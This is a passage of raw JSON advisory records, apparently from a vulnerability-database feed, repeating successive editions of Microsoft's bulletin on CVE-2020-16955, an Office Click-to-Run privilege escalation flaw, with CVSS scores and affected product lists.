"kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T18:49:36", "differentElements": ["msAffectedSoftware"], "edition": 65}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-19T20:59:13", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-19T14:49:33", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-19T14:49:33", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T20:59:13", "differentElements": ["msAffectedSoftware"], "edition": 66}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-20T02:45:06", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-20T02:45:06", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-20T02:45:06", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T02:45:06", "differentElements": ["msAffectedSoftware"], "edition": 67}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "373ddf0c9180a32185e2580f0312594f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-20T04:47:20", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-20T02:45:06", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-20T02:45:06", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T04:47:20", "differentElements": ["msAffectedSoftware"], "edition": 68}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-20T06:49:54", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-20T02:45:06", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-20T02:45:06", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T06:49:54", "differentElements": ["msAffectedSoftware"], "edition": 69}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "380c01a7f417ccb3418ade4faba49154", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-20T08:45:06", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-20T02:45:06", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-20T02:45:06", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T08:45:06", "differentElements": ["msAffectedSoftware"], "edition": 70}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-20T10:55:28", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-20T02:45:06", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-20T02:45:06", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T10:55:28", "differentElements": ["msAffectedSoftware"], "edition": 71}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "373ddf0c9180a32185e2580f0312594f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-20T12:46:29", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-20T02:45:06", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-20T02:45:06", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for 